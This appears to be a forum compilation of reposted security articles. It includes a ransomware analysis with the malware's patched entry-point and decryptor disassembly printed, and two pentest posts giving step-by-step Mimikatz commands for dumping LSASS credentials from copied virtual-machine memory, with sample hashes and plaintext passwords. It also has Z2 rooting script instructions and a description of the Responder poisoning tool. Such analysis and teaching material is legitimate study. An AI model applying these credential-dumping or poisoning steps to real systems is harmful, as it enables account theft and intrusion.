[h=2]Ransomware infecting user32.dll[/h] Over the past months we’ve been monitoring a new variant of the Department of Justice (DOJ) ransomware. Till date there is nothing written about this new variant on the internet. This blog item aims to address this. Analysis of this particular ransomware shows that the method to infect victims is different compared to previous ransomware samples. Instead of dropping an executable on the system it infects the Windows system DLL: user32.dll. This file is typically located in: C:\Windows\System32\user32.dll or C:\Windows\SysWOW64\user32.dll So far we’ve observed that the ransomware is only infecting the 32-bit version of user32.dll. Static detection Our support desk helped a victim in January 2014. Four months later, detection is still poor: Resource section The ransomware enlarges the resource section of user32.dll as can be seen in the table below: [TABLE] [TR] [TH=colspan: 4]Original user32.dll[/TH] [TH=colspan: 4]Infected user32.dll[/TH] [/TR] [TR] [TH]name[/TH] [TH]va[/TH] [TH]vsize[/TH] [TH]rawsize[/TH] [TH]name[/TH] [TH]va[/TH] [TH]vsize[/TH] [TH]rawsize[/TH] [/TR] [TR] [TD].text[/TD] [TD]0×1000[/TD] [TD]0x5f283[/TD] [TD]0x5f400[/TD] [TD].text[/TD] [TD]0×1000[/TD] [TD]0x5f283[/TD] [TD]0x5f400[/TD] [/TR] [TR] [TD].data[/TD] [TD]0×61000[/TD] [TD]0×1180[/TD] [TD]0xc00[/TD] [TD].data[/TD] [TD]0×61000[/TD] [TD]0×1180[/TD] [TD]0xc00[/TD] [/TR] [TR] [TD].rsrc[/TD] [TD]0×63000[/TD] [TD]0x2a088[/TD] [TD]0x2a200[/TD] [TD].rsrc[/TD] [TD]0×63000[/TD] [TD]0x33a88[/TD] [TD]0x33c00 [/TD] [/TR] [TR] [TD].reloc[/TD] [TD]0x8e000[/TD] [TD]0x2de4[/TD] [TD]0x2e00[/TD] [TD].reloc[/TD] [TD]0x8e000[/TD] [TD]0x2de4[/TD] [TD]0x2e00[/TD] [/TR] [/TABLE] Analysis of the increased resource section in this file shows that it contains an encrypted payload with a decryptor embedded. We will show how the malware gets active once it has successfully infected the user32.dll file. EntryPoint patched The code in the entrypoint of an infected user32.dll is patched with a jump to AlignRects, as can be seen below: Original: UserClientDllInitialize: 7e41b217 8B FF mov edi, edi 7e41b219 55 push ebp 7e41b21a 8B EC mov ebp, esp 7e41b21c 83 7D 0C 01 cmp [ebp+0xC], 1 7e41b220 75 05 jnz 0x7e41b227 7e41b222 E8 5D 07 00 00 call 0x7e41b984 7e41b227 5D pop ebp 7e41b228 90 nop 7e41b229 90 nop 7e41b22a 90 nop 7e41b22b 90 nop 7e41b22c 90 nop 7e41b22d 8B FF mov edi, edi 7e41b22f 55 push ebp 7e41b230 8B EC mov ebp, esp Patched: UserClientDllInitialize: 7e41b217 8B FF mov edi, edi 7e41b219 55 push ebp 7e41b21a 8B EC mov ebp, esp 7e41b21c 83 7D 0C 01 cmp [ebp+0xC], 1 7e41b220 75 0E jnz 0x7e41b230 7e41b222 E8 00 00 00 00 call 0x7e41b227 7e41b227 83 04 24 0A add [esp], 0xa 7e41b22b E9 B0 22 05 00 jmp AlignRects ________________________________________ 7e41b230 8B EC mov ebp, esp The code at AlignRects is not the original, but is replaced with code that allocates a new block of executable memory. Hereafter it copies the encrypted payload from the resource section to this newly allocated memory. AlignRects: 7e46d4e0 leave 7e46d4e1 pusha 7e46d4e2 push ebp 7e46d4e3 mov ebp, esp 7e46d4e5 sub esp, 8 7e46d4e8 mov eax, [ebp+0x4C] ; EAX becomes base-address of ; user32.dll (7E410000) 7e46d4eb mov ecx, eax 7e46d4ed add eax, 0x13bc 7e46d4f2 mov eax, [eax] ; EAX becomes address of ; NtQueryVirtualMemory 7e46d4f4 add eax, 0xfffff5f0 ; EAX becomes address of ; NtAllocateVirtualMemory 7e46d4f9 push 0x40 7e46d4fb push 0x3000 7e46d500 lea ecx, [ebp-0x4] 7e46d503 mov [ecx], 0xc576 7e46d509 push ecx 7e46d50a push 0 7e46d50c lea ecx, [ebp-0x8] 7e46d50f mov [ecx], 0 7e46d515 push ecx 7e46d516 push 0xff 7e46d518 call eax ; Call NtAllocateVirtualMemory 7e46d51a mov edi, [ebp-0x8] ; EDI = allocated address 7e46d51d mov eax, edi 7e46d51f mov esi, [ebp+0x4C] ; ESI = base-address of ; user32.dll (7E410000) 7e46d522 add esi, 0x8d200 ; ESI = address of encrypted payload ; in resource section 7e46d528 mov ecx, 0x98bb 7e46d52d rep movs es:[edi], ds:[esi] ; Copy to allocated ; (executable) range 7e46d52f leave 7e46d530 add eax, 0x981e ; EAX = address of decryption code 7e46d535 jmp eax ; Start decryption !! As can be seen from this code an executable block of memory is allocated. In order to do that, the address of NtAllocateVirtualMemory is calculated using the address of NtQueryVirtualMemory, which was obtained from the IAT of user32.dll. The encrypted payload is copied into the newly allocated range of memory. This encrypted payload contains a small piece of decryption code, located near the end of the encrypted payload. This decryption code is shown below: 0:000> r eax=0029981e ebx=7e41b217 ecx=00000000 edx=7c90e514 esi=7e4a6abb edi=002998bb eip=0029981e esp=0007f9d4 ebp=0007fa10 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 0:000> u eax l20 0029981e call 00299823 00299823 pop edx EDX = current location ! 00299824 sub edx,7FFA2F22h 0029982a push esi 0029982b lea esi,[edx+7FFA2F1Dh] ESI = allocated mem-base (290000) 00299831 mov ecx,981Eh ECX = size to decrypt (num bytes) 00299836 sub esi,ecx 00299838 push esi 00299839 mov ebx,6FAAEh The XOR key (BL only, so AEh) 0029983e xor byte ptr [esi],bl Decrypt byte-by-byte 00299840 inc esi 00299841 inc ebx Modify XOR key for each byte (+1) 00299842 loop 0029983e 00299844 pop eax 00299845 pop ecx 00299846 mov dword ptr [eax+12h],ecx 00299849 jmp eax Jump to allocated mem-base, which is now decrypted. The decryption of the payload uses a XOR based decryption scheme were the XOR value for each byte to decrypt is incremented after each operation. Once all bytes in the allocated memory range are decrypted, the now plain code is executed. Note the first two instructions of this decryption code, where a call/pop combination is used to obtain the current address. This makes the decryption code position independent. The only ‘fixed’ values in this code are the size of the encrypted payload and the XOR key, so automating the payload and decryptor to avoid static detection can be easily accomplished. Once the ransomware becomes active, some typical ransomware behavior is performed: Windows Safe Mode is disabled Task Manager is blocked Command Prompt is blocked Registry Editor is blocked … and of course the police themed picture is shown where a ransom fee is demanded in order to release the PC (see picture at the top of this article). Victims can use the very easy-to-use HitmanPro.Kickstart to get rid of police themed ransomware infection. Blocking CD-ROM drives A new property of this particular ransomware is that it disables CD-ROM drives. This makes it for some computers harder to clean the system as is explained below. When HitmanPro detects a system file that is infected, it searches for a white-listed variant on the computer. This as Windows tends to keep a copy of system files on multiple locations on the hard disk. If HitmanPro cannot find a white-listed known safe version, it prompts for the Windows installation CD/DVD media that came with the computer. This is a very useful feature of HitmanPro and it has been in HitmanPro for years to return infected system files to pristine state! But since this new ransomware infection blocks access to the CD/DVD the user can no longer provide the Windows installation media for original files. New Cloud Service Today we release a BETA build of HitmanPro that queries a new HitmanPro-cloud service that can provide a clean system file so that the user no longer has to provide Windows installation media. 32-bit: http://dl.surfright.nl/HitmanProBeta.exe 64-bit: http://dl.surfright.nl/HitmanProBeta_x64.exe Samples: 3AF4FA2BFFAAB37FD557AE8146AE0A29BA0FAF6D99AD8A1A8D5BF598AC9A23D1 3A061EE07D87A6BB13E613E000E9F685CBFFB96BD7024A9E7B4CB0BE9A4AF38C 7DD93123078B383EC179C4C381F9119F4EAC4EFB287FE8F538A82E7336DFA4CA Sursa: Ransomware infecting user32.dll |

How to Get Started in CTF by Steve Vittitoe Over the past two weeks, I’ve examined two different problems from the DEFCON 22 CTF Qualifications: “shitsco” and “nonameyet”. Thank you for all of the comments and questions. The most popular question I received was “How can I get started in CTFs?” It wasn’t so long ago that I was asking myself the same thing, so I wanted to provide some suggestions and resources for those of you interested in pursuing CTFs. The easiest way to start is to sign up for an introductory CTF like CSAW, Pico CTF, Microcorruption, or any of the other dozens available. Through practice, patience, and dedication, your skills will improve with time. If you’re motivated to take a crack at some of the problems outside of the competition setting, most CTF competitions archive problems somewhere. Challenges tend to have a wide range of difficulty levels as well. Be careful about just picking the easiest problems. Difficulty is subjective based on your individual skillset. If your forte is forensics but you are not skilled in crypto, the point values assigned to the forensics problems will seem inflated while the crypto challenges will seem undervalued to you. The same perception biases hold true for CTF organizers. This is one reason why assessing the difficulty of CTF problems is so challenging. If you’ve tried several of the basic problems on your own and are still struggling, then there are plenty of self-study opportunities. CTF competitions generally focus on the following skills: reverse engineering, cryptography, ACM style programming, web vulnerabilities, binary exercises, networking, and forensics. Pick one and focus on a single topic as you get started. 1) Reverse Engineering. I highly suggest that you get a copy of IDA Pro. There is a free version available as well as a discounted student license. Try some crack me exercises. Write your own C code and then reverse the compiled versions. Repeat this process while changing compiler options and program logic. How does an “if” statement differ from a “select” in your compiled binary? I suggest you focus on a single architecture initially: x86, x86_64, or ARM. Read the processor manual for whichever one you choose. Book recommendations include: Practical Reverse Engineering Reversing: Secrets of Reverse Engineering The IDA Pro Book 2) Cryptography. While this is not my personal strength, here are some resources to check out: Applied Cryptography Practical Cryptography Cryptography I 3) ACM style programming. Pick a high level language. I recommend Python or Ruby. For Python, read Dive into Python (free) and find a pet project you want to participate in. It is worth noting that Metasploit is written in Ruby. Computer science classes dealing with algorithms and data structures will go a long way in this category as well. Look at past programming challenges from CTF and other competitions – do them! Focus on creating a working solution rather than the fastest or most elegant solution, especially if you are just getting started. 4) Web vulnerabilities. There are many web programming technologies out there. The most popular in CTF tend to be PHP and SQL. The php.net site is a fantastic language reference. Just search any function you are curious about. After PHP, the next most common way to see web challenges presented is with Python or Ruby scripts. Notice the overlap of skills? There is a good book on web vulnerabilities, The Web Application Hacker’s Handbook. Other than that, after learning some of the basic techniques, you might also think about gaining expertise in a few of the more popular free tools available. These are occasionally useful in CTF competitions too. This category also frequently overlaps with cryptography in my experience. 5) Binary exercises. This is my personal favorite. I recommend you go through reverse engineering before jumping into the binary exercises. There are a few common vulnerability types you can learn in isolation: stack overflows, heap overflows, and format string bugs for starters. A lot of this is training your mind to recognize vulnerable patterns. Looking at past vulnerabilities is a great way to pick up these patterns. You should also read through: Hacking: The Art of Exploitation The Shellcoders Handbook The Art of Software Security Assessment 6) Forensics/networking. A lot of CTF teams tend to have “the” forensics guy. I am not that guy, but I suggest you learn how to use the 010 hex editor and don’t be afraid to make absurd, wild, random guesses as to what could be going on in some of these problems. Finally, Dan Guido and company recently put out the CTF field guide, which is a great introduction to several of these topics. Sursa: How to Get Started in CTF | Endgame.

HTTPie: a CLI, cURL-like tool for humans HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized responses. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers. HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries. Table of Contents Main Features Installation Usage HTTP Method Request URL Request Items JSON Forms HTTP Headers Authentication Proxies HTTPS Output Options Redirected Input Terminal Output Redirected Output Download Mode Streamed Responses Sessions Config Scripting Interface Design Contribute Logo Authors Licence Changelog Main Features Expressive and intuitive syntax Formatted and colorized terminal output Built-in JSON support Forms and file uploads HTTPS, proxies, and authentication Arbitrary request data Custom headers Persistent sessions Wget-like downloads Python 2.6, 2.7 and 3.x support Linux, Mac OS X and Windows support Documentation Test coverage Sursa: https://github.com/jakubroztocil/httpie

[h=1]termcoin[/h] A bitcoin wallet and blockchain explorer for your terminal. termcoin bitcoin wallet and blockchain explorer for your terminal, written for node.js termcoin's UI is rendered by blessed which is a full ncurses replacement and high-level widget library. Expect mouse support, eye-candy hover effects, and so-on. termcoin's bitcoin implementation is now based on BCoin which fully implements BIP-37's description of bloom filters. This basically means you don't have to download the entire blockchain to use your wallet. You ask for and store only the transactions relevant to you (broadcasted in your bloom filter), while at the same time being able to verify the merkleroot of blocks. The blockchain explorer currently uses the blockchain.info json api as a backend. In the future, termcoin will leave an option for the user to download the entire blockchain in the background (using bcoin - out of sheer obsession, I implemented the original satoshi protocol in bcoin), which means you will be able to explore the blockchain on your local disk instead of waiting for api calls to return. For data management, termcoin uses tiny as the database necessary to store the (small) blockchain data and transactions relevant to your account. BCoin was conceived brilliantly, and Fedor Indunty also went to the trouble of writing an ecdsa and bignumber library in pure javascript to supplement BCoin. With all this being said, it's worth pointing out that termcoin is written entirely in pure javascript. All of this means: No compiling a database binding No compiling a binding to an ecdsa library No linking to ncurses No running a bitcoin rpc server in the background No downloading a 20gb blockchain Just use your wallet and enjoy! Termcoin uses a basic JSON wallet format with private keys that are compatible with bitcoind's importprivkey/dumpprivkey (128-prefixed+checksumed+base58) keys. (It also supports AES-CBC encryption for your private keys, just like the official bitcoin client). NOTE: Termcoin used to use bitcoind/litecoind/etc as a backend. This backend is still supported for other currencies. It's just not as featureful due to limitations in the [coin]d rpc server. [h=2]Screenshots[/h] Sursa: https://github.com/chjj/termcoin

Tor Is For Everyone: Why You Should Use Tor EFF recently kicked off our second Tor Challenge, an initiative to strengthen the Tor network for online anonymity and improve one of the best free privacy tools in existence. The campaign—which we've launched with partners at the Freedom of the Press Foundation, the Tor Project, and the Free Software Foundation—is already off to a great start. In just the first few days, we've seen over 600 new or expanded Tor nodes—more than during the entire first Tor Challenge. This is great news, but how does it affect you? To understand that, we have to dig into what Tor actually is, and what people can do to support it. Support can come in many forms, too. Even just using Tor is one of the best and easiest things a person can do to preserve privacy and anonymity on the Internet. What is Tor? Tor is a network and a software package that helps you anonymously use the Internet. Specifically Tor hides the source and destination of your Internet traffic, this prevents anyone from knowing both who you are and what you are looking at (though they may know one or the other). Tor also hides the destination of your traffic, which can circumvent some forms of censorship. Tor has been in development for many years and is very stable and mature. It is regarded as one of the best privacy tools currently in existence and it does not cost you anything. How does Tor help me? This graphic shows how Tor and https can work together to protect your privacy on the Internet. Basically, Tor encrypts that data you send across the Internet in multiple layers, like an onion. Then it sends that data through multiple relays, each one of which peels a layer off the onion until your packet leaves the final relay and gets to its destination. This is called 'onion routing' and it is a fantastic method for keeping privacy on the web. Proper use of tor—along with HTTPS Everywhere—can be one of the best ways to ensure your browsing will remain anonymous. But I don't need privacy, I have nothing to hide! Everyone needs privacy sometimes! For example: perhaps you end up with an embarrassing medical condition and you want to search for information about it but you don't want Google and every advertiser to know about your bodily functions. Tor can help you keep that information private. Tor can also help prevent online tracking more generally as well. Proper use of Tor can circumvent most third party trackers that governments and corporations can use to track your browsing habits and send you obnoxious intrusive advertisements. Tor can also protect your data from hackers on your network. Tor can also help you get around censorship and firewalls from the filter at your school or office or even help you circumvent firewalls or censorship put in place by your government. How do I use Tor? The easiest way to get up and running with Tor is to use the Tor Browser Bundle. It is a version of Firefox that comes preconfigured to use Tor. Tor Browser Bundle is set up to use Tor the right way so that you will avoid a lot of the common pitfalls that can pierce your veil of anonymity. If your prefer a more holistic approach or wish to use Tor for something other than just web browsing, you can use Tails. Tails is an operating system that runs off of a live CD. It is configured so that all Internet connections run through Tor; and when you are done, everything that you did is wiped clean from your computer's memory. It never touches your hard drive and leaves no traces on your computer. If you want to use Tor on your android phone, check out Orbot, it can run your browsing and other programs through Tor. Tor sounds great. What can I do to help? To help make Tor faster and more secure one of the best things you can do is set up a Tor relay. That's what we're asking people to do in our Tor Challenge. The more relays there are in the Tor network the more speed and security Tor has. Setting up a relay may also improve your own personal anonymity. But even just using Tor increases the anonymity of all the other users. There's some safety in numbers: if the only people using Tor are those who have a serious need for it then any use of Tor is suspicious. But if Tor gets used for everything from pizza orders to looking at funny cat photos then it is much less so. So if I use Tor will I have perfect anonymity all of the time? Nothing is foolproof, not even Tor. If you use Tor the wrong way you can end up destroying your own anonymity. If you use Tor to log into Facebook or Gmail, for example, they may not know where you are coming from but they will certainly know who you are and they may even be able to track your browsing around the web. The Tor Project has posted a list of common mistakes that inexperienced users sometimes make. When used properly Tor is one of the best tools for internet privacy that exists. You can use it to circumvent firewalls in an oppressive country, retain your privacy, or browse the Internet while at school. Setting up and running Tor is easy and it is one of the best things any citizen of the Internet can do to help keep a free and open Internet. And if you can run a Tor relay, or want to commit to boosting the bandwidth on a relay you already run, you can take part in our Tor Challenge and push us over our target while collecting prizes. Check out the Tor Challenge today. Sursa: https://www.eff.org/deeplinks/2014/06/why-you-should-use-tor

Blackberry Forensics 1.0. UNLOCKED BLACKBERRY DEVICES Unlocked BlackBerry device with no password Situation •BB contains memory card and SIM. •Which type of data extraction should be performed and in what order? •Physical, File System, then Logical? Examiner Considerations: •There are a variety of tools available to the examiner. •Start Physical, if supported,then move to File System and Logical. •Wear Leveling •A data structure at the logical level, in the form of a logical backup/acquisition is different than the same record at the physical level. •** In rare cases performing a physical with UFED may cause device to reset itself to factory default. •This referred by Cellebrite as “cache memory reset”. Download: https://digital-forensics.sans.org/summit-archives/dfir14/BlackBerry_Forensic_Nuggets_Shafik_Punja_and_Cindy_Murphy.pdf

DNS Sinkhole This paper describes the architecture and configuration of a complete Domain Name Services (DNS) sinkhole system based on open-source software. The DNS sinkhole can be used to provide detection and prevention of malicious and unwanted activity occurring between organization computer systems and the Internet. The system is inexpensive, effective, scalable and easy to maintain. Download: https://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523

Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net> Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. Download: https://cansecwest.com/csw07/csw07-nazario.pdf

[h=3]Mimikatz Against Virtual Machine Memory Part 2[/h] Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012 First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them: Use the Microsoft Symbol Server to obtain debug symbol files .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols 0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols 0: kd> .reload Loading Kernel Symbols ............................................................... ................................................................ .............. Loading User Symbols Loading unloaded module list ......... Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility. Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above) For VMware ESXi i just needed to pass the .vmsn file The rest follows the same flow as the previous post 1. Load the memory.dmp file vmss2core created 2. Fix your symbols (shown above) 3. Load the mimilib.dll file kd> .load C:\users\user\desktop\mimilib.dll 4. Find the lsass process kd> !process 0 0 lsass.exe PROCESS ffffe00112f08080 SessionId: 0 Cid: 01e8 Peb: 7ff623aac000 ParentCid: 0194 DirBase: 06291000 ObjectTable: ffffc001f8f0c400 HandleCount: Image: lsass.exe 5. Switch to that process kd> .process /r /p ffffe00112f08080 Implicit process is now ffffe001`12f08080 Loading User Symbols ................................................................ 6. Run Mimikatz kd> !mimikatz 7. Drink Beers Posted by CG at 11:45 AM Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 2

[h=3]Mimikatz Against Virtual Machine Memory Part 1[/h]Pentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on all those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and I reminisced about the missed shells. This post and part 2 is like that for me. I can't count the number of times i've had access to the folder full of an organization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like volatility on them to carve out useful pieces of the file system but not memory. While doing some research on vCenter/ESXi I came across a couple of blog posts on the subject: Extract Windows passwords from VMware .vmem file WinDbg et l’extension de mimikatz | Blog de Gentil Kiwi Password dump from a Hyper-V Virtual Machine´s memory | vNiklas Virtualization blog This of course sent me down the rabbit hole to see if I could do it. Remko's post mentions you need a few things: The Windows debugging tools: Debugging Tools for Windows Direct Download - Remko Weijnen's Blog (Remko's Blog) WinDBG | Blog de Gentil Kiwi The Windows Memory Toolkit MoonSols Windows Memory Toolkit | MoonSols Current mimikatz that supports the windbg magic https://github.com/gentilkiwi/mimikatz Gotcha #1: The free version of Windows Memory Toolkit limits OS and architecture you can do this on. Restrictions are 32bit up to Windows Server 2008. The process: #1 Copy the vmem/vmsn from the remote host #2 Use moonsols bin2dmp to convert it into a dmp file. (I'm using the for pay version below) C:\Users\user\Desktop>Bin2Dmp.exe "Windows Server 2008 x64-b2afd86a.vmem" win2k8.dmp bin2dmp - v2.1.0.20140115 Convert raw memory dump images into Microsoft crash dump files. Copyright (C) 2007 - 2014, Matthieu Suiche Copyright (C) 2012 - 2014, MoonSols Limited Initializing memory descriptors... Done. Directory Table Base is 0x124000 Looking for Kernel Base... Looking for kernel variables... Done. Loading file... Done. nt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0 stuff happens [0x0000000040000000 of 0x0000000040000000] [0x000000001DAFE000 of 0x000000 MD5 = E8C2F318FA528285281C21B3141E7C51 Total time for the conversion: 0 minutes 14 seconds. you should now have a .dmp file you can load into windbg #3 Load the dmp file into windbg Gotcha #2: You may have to run .symfix and .reload kd> .symfix kd> .reload Loading Kernel Symbols ............................................................... ................................................................ ..... Loading User Symbols Loading unloaded module list .... #4 Load the mimilib.dll file kd> .load C:\users\user\desktop\mimilib.dll .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 25 2014 21:48:13) .## ^ ##. Windows build 6002 ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' WinDBG extension ! * * */ =================================== # * Kernel mode * # =================================== # Search for LSASS process 0: kd> !process 0 0 lsass.exe # Then switch to its context 0: kd> .process /r /p # And finally : 0: kd> !mimikatz =================================== # * User mode * # =================================== 0:000> !mimikatz =================================== The tool output will walk you through the rest #5 Find the lsass process kd> !process 0 0 lsass.exe PROCESS fffffa800dba26d0 SessionId: 0 Cid: 023c Peb: 7fffffd4000 ParentCid: 01e4 DirBase: 2e89f000 ObjectTable: fffff880056562c0 HandleCount: 1092. Image: lsass.exe #6 switch to the lsass context fffffa800dba26d0 in this case kd> .process /r /p fffffa800dba26d0 Implicit process is now fffffa80`0dba26d0 Loading User Symbols ................................................................ ...................... #7 Load mimikatz kd> !mimikatz Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : WIN-3C4WXGGN8QE$ Domain : UNLUCKYCOMPANY SID : S-1-5-20 msv : [00000002] Primary * Username : WIN-3C4WXGGN8QE$ * Domain : UNLUCKYCOMPANY * NTLM : ea2ed0b14406a168791adf5aee78fd0b * SHA1 : ab7bd2f6a64cf857c9d69dd65916622e3dc25424 tspkg : KO ---SNIP--- Authentication Id : 0 ; 173319 (00000000:0002a507) Session : Interactive from 1 User Name : Administrator Domain : UNLUCKYCOMPANY SID : S-1-5-21-2086621178-2413078777-1398328459-500 msv : [00000002] Primary * Username : Administrator * Domain : UNLUCKYCOMPANY * LM : e52cac67419a9a2238f10713b629b565 * NTLM : 64f12cddaa88057e06a81b54e73b949b * SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8 tspkg : * Username : Administrator * Domain : UNLUCKYCOMPANY * Password : Password1 wdigest : * Username : Administrator * Domain : UNLUCKYCOMPANY * Password : Password1 kerberos : * Username : Administrator * Domain : UNLUCKYCOMPANY.NET * Password : Password1 * Key List ---SNIP--- There were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2. CG Posted by CG at 12:37 PM Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 1

Z2 Root Exploit Hey guys, this is a cross-post of sorts. I just got root execution on my stock Z2 Tablet and it appears that the same method should work for Z2 phone. I have a Z2 phone but just haven't tested it on that one yet. Here is my Linux script to grab the TA partition from Z2: https://mega.co.nz/#!bVYx2I4S!x-9qkv...VfbiAd0jEDDgWY [update, v4] DooMLoRD's Windows version: http://doomlord.xperia-files.com/dow...Y0X1dJTkRPV1M= Requirements: 1. Be on an early Z2 phone/tablet firmware. .69 is confirmed working, .402 is confirmed patched 2. Use Linux or something that has 'bash' Instructions: 1. Extract exploit.tar.gz and run ./root1.sh 2. Crash the system menu that appears by doing System Info -> Configuration or similar. 3. Run ./root2.sh 4. Repeat Step #2 3. Your TA.img should now be in /data/local/tmp. Use adb pull /data/local/tmp/TA.img to retrieve it. Tell me if it works or if you get any errors. Thanks. Sursa: Z2 Root Exploit - xda-developers

[h=2]Low level PC attack papers[/h]BIOS/Firmware: Attacking Intel BIOS BootKit: eEye BootRoot Bootkit: Deep Boot ... Sursa: A Timeline made with Timeglider, web-based timeline software

[h=1]Responder[/h]Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [h=1]INTRODUCTION[/h] This tool is first an LLMNR, NBT-NS and MDNS responder, it will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: NetBIOS Suffixes (16th Character of the NetBIOS Name)). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want this tool to answer to the Workstation Service request name suffix. Sursa: https://github.com/Spiderlabs/Responder

Translate regular Assembly into Extended Instructions SSEXY - Convert x86 Instruction into their SSE equivalent. For more information; read the slides and summary which can be found here. http://jbremer.org/ssexy.zip Sursa: https://github.com/jbremer/ssexy